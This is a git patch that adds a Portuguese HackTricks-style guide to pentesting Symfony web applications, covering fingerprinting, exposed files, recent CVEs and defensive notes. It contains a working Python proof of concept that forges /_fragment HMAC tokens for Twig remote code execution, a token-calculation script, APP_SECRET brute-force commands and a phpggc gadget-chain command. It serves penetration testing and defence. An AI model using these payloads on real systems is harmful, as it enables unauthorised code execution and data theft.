From 86221152e53fb343c7af28b88f021c93c87c4a87 Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 23 Jul 2025 10:24:43 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-web/symphony.md' --- .../pentesting-web/symphony.md | 121 +++++++++++++++++- 1 file changed, 117 insertions(+), 4 deletions(-) diff --git a/src/network-services-pentesting/pentesting-web/symphony.md b/src/network-services-pentesting/pentesting-web/symphony.md index 459277021..619bb81d2 100644 --- a/src/network-services-pentesting/pentesting-web/symphony.md +++ b/src/network-services-pentesting/pentesting-web/symphony.md @@ -2,10 +2,123 @@ {{#include ../../banners/hacktricks-training.md}} -Dê uma olhada nos seguintes posts: +Symfony é um dos frameworks PHP mais amplamente utilizados e aparece regularmente em avaliações de alvos empresariais, de e-commerce e CMS (Drupal, Shopware, Ibexa, OroCRM … todos incorporam componentes Symfony). Esta página coleta dicas ofensivas, configurações incorretas comuns e vulnerabilidades recentes que você deve ter em sua lista de verificação ao descobrir uma aplicação Symfony. -- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment) -- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807) -- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144) +> Nota histórica: Uma grande parte do ecossistema ainda utiliza a versão **5.4 LTS** (EOL **Novembro 2025**). Sempre verifique a versão menor exata, pois muitos avisos de segurança de 2023-2025 foram corrigidos apenas em lançamentos de patch (por exemplo, 5.4.46 → 5.4.50). +--- + +## Recon & Enumeração + +### Finger-printing +* Cabeçalhos de resposta HTTP: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` ou cookies que começam com `sf_redirect`, `sf_session`, `MOCKSESSID`. +* Vazamentos de código-fonte (`composer.json`, `composer.lock`, `/vendor/…`) frequentemente revelam a versão exata: +```bash +curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version' +``` +* Rotas públicas que existem apenas no Symfony: +* `/_profiler` (Symfony **Profiler** & barra de ferramentas de depuração) +* `/_wdt/` (“Web Debug Toolbar”) +* `/_error/{code}.{_format}` (páginas de erro formatadas) +* `/app_dev.php`, `/config.php`, `/config_dev.php` (controladores front-end de desenvolvimento pré-4.0) +* Wappalyzer, BuiltWith ou listas de palavras ffuf/feroxbuster: `symfony.txt` → procure por `/_fragment`, `/_profiler`, `.env`, `.htaccess`. + +### Arquivos e endpoints interessantes +| Caminho | Por que é importante | +|------|----------------| +| `/.env`, `/.env.local`, `/.env.prod` | Frequentemente mal implantados → vazam `APP_SECRET`, credenciais DB, SMTP, chaves AWS | +| `/.git`, `.svn`, `.hg` | Divulgação de código-fonte → credenciais + lógica de negócios | +| `/var/log/*.log`, `/log/dev.log` | Configuração incorreta do web-root expõe rastreamentos de pilha | +| `/_profiler` | Histórico completo de requisições, configuração, contêiner de serviços, **APP_SECRET** (≤ 3.4) | +| `/_fragment` | Ponto de entrada usado por ESI/HInclude. Abuso possível uma vez que você conheça `APP_SECRET` | +| `/vendor/phpunit/phpunit/phpunit` | RCE do PHPUnit se acessível (CVE-2017-9841) | +| `/index.php/_error/{code}` | Finger-print & às vezes vaza rastros de exceção | + +--- + +## Vulnerabilidades de alto impacto (2023-2025) + +### 1. Divulgação de APP_SECRET ➜ RCE via `/_fragment` (também conhecido como “secret-fragment”) +* **CVE-2019-18889** originalmente, mas *ainda* aparece em alvos modernos quando a depuração é deixada habilitada ou `.env` é exposto. +* Uma vez que você conheça o `APP_SECRET` de 32 caracteres, crie um token HMAC e abuse do controlador interno `render()` para executar Twig arbitrário: +```python +# PoC – requer o segredo +import hmac, hashlib, requests, urllib.parse as u +secret = bytes.fromhex('deadbeef…') +payload = "{{['id']|filter('system')}}" # RCE em Twig +query = { +'template': '@app/404.html.twig', +'filter': 'raw', +'_format': 'html', +'_locale': 'en', +'globals[cmd]': 'id' +} +qs = u.urlencode(query, doseq=True) +token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest() +r = requests.get(f"https://target/_fragment?{qs}&_token={token}") +print(r.text) +``` +* Excelente artigo e script de exploração: blog Ambionics (linkado nas Referências). + +### 2. Sequestro de Processo do Windows – CVE-2024-51736 +* O componente `Process` pesquisou o diretório de trabalho atual **antes** do `PATH` no Windows. Um atacante capaz de fazer upload de `tar.exe`, `cmd.exe`, etc. em um web-root gravável e acionar `Process` (por exemplo, extração de arquivos, geração de PDF) ganha execução de comando. +* Corrigido em 5.4.50, 6.4.14, 7.1.7. + +### 3. Fixação de Sessão – CVE-2023-46733 +* O guardião de autenticação reutilizou um ID de sessão existente após o login. Se um atacante definir o cookie **antes** que a vítima se autentique, ele sequestra a conta após o login. + +### 4. XSS no sandbox do Twig – CVE-2023-46734 +* Em aplicações que expõem templates controlados pelo usuário (CMS admin, construtor de e-mail), o filtro `nl2br` poderia ser abusado para contornar o sandbox e injetar JS. + +### 5. Cadeias de gadgets Symfony 1 (ainda encontradas em aplicativos legados) +* `phpggc symfony/1 system id` produz um payload Phar que aciona RCE quando um unserialize() acontece em classes como `sfNamespacedParameterHolder`. Verifique endpoints de upload de arquivos e wrappers `phar://`. + +{{#ref}} +../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md +{{#endref}} + +--- + +## Cheat-Sheet de Exploração + +### Calcular token HMAC para `/_fragment` +```bash +python - <<'PY' +import sys, hmac, hashlib, urllib.parse as u +secret = bytes.fromhex(sys.argv[1]) +qs = u.quote_plus(sys.argv[2], safe='=&') +print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()) +PY deadbeef… "template=@App/evil&filter=raw&_format=html" +``` +### Bruteforce fraco `APP_SECRET` +```bash +cewl -d3 https://target -w words.txt +symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target +``` +### RCE via exposed Symfony Console +Se `bin/console` for acessível através de `php-fpm` ou upload direto de CLI: +```bash +php bin/console about # confirm it works +php bin/console cache:clear --no-warmup +``` +Use gadgets de desserialização dentro do diretório de cache ou escreva um template Twig malicioso que será executado na próxima solicitação. + +--- + +## Notas defensivas +1. **Nunca implemente debug** (`APP_ENV=dev`, `APP_DEBUG=1`) em produção; bloqueie `/app_dev.php`, `/_profiler`, `/_wdt` na configuração do servidor web. +2. Armazene segredos em variáveis de ambiente ou `vault/secrets.local.php`, *nunca* em arquivos acessíveis através do document-root. +3. Imponha a gestão de patches – inscreva-se em avisos de segurança do Symfony e mantenha pelo menos o nível de patch LTS. +4. Se você estiver rodando no Windows, atualize imediatamente para mitigar CVE-2024-51736 ou adicione uma defesa em profundidade `open_basedir`/`disable_functions`. + +--- + +### Ferramentas ofensivas úteis +* **ambionics/symfony-exploits** – RCE de fragmento secreto, descoberta de rotas de depuração. +* **phpggc** – Cadeias de gadgets prontas para Symfony 1 & 2. +* **sf-encoder** – pequeno auxiliar para calcular HMAC de `_fragment` (implementação em Go). + +## Referências +* [Ambionics – Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment) +* [Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class) {{#include ../../banners/hacktricks-training.md}}